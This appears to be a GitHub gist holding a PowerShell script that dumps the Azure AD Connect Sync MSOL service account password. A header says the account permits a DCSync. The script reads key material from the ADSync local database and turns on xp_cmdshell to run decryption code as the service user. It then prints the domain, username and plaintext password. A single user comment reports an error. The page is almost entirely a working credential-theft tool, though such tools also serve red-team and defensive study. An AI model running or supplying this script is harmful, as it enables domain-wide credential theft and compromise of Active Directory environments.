Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" | |
try { | |
$client.Open() | |
} catch { | |
Write-Host "[!] Could not connect to localdb..." | |
return | |
} | |
Write-Host "[*] Querying ADSync localdb (mms_server_configuration)" | |
$cmd = $client.CreateCommand() | |
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" | |
$reader = $cmd.ExecuteReader() | |
if ($reader.Read() -ne $true) { | |
Write-Host "[!] Error querying mms_server_configuration" | |
return | |
} | |
$key_id = $reader.GetInt32(0) | |
$instance_id = $reader.GetGuid(1) | |
$entropy = $reader.GetGuid(2) | |
$reader.Close() | |
Write-Host "[*] Querying ADSync localdb (mms_management_agent)" | |
$cmd = $client.CreateCommand() | |
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" | |
$reader = $cmd.ExecuteReader() | |
if ($reader.Read() -ne $true) { | |
Write-Host "[!] Error querying mms_management_agent" | |
return | |
} | |
$config = $reader.GetString(0) | |
$crypted = $reader.GetString(1) | |
$reader.Close() | |
Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user" | |
$cmd = $client.CreateCommand() | |
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'" | |
$reader = $cmd.ExecuteReader() | |
$decrypted = [string]::Empty | |
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) { | |
$decrypted += $reader.GetString(0) | |
} | |
if ($decrypted -eq [string]::Empty) { | |
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell" | |
return | |
} | |
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}} | |
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}} | |
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}} | |
Write-Host "[*] Credentials incoming...`n" | |
Write-Host "Domain: $($domain.Domain)" | |
Write-Host "Username: $($username.Username)" | |
Write-Host "Password: $($password.Password)" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
I'm getting the same "Cannot find the file specified" error using this updated version as well as the old one:
Any ideas?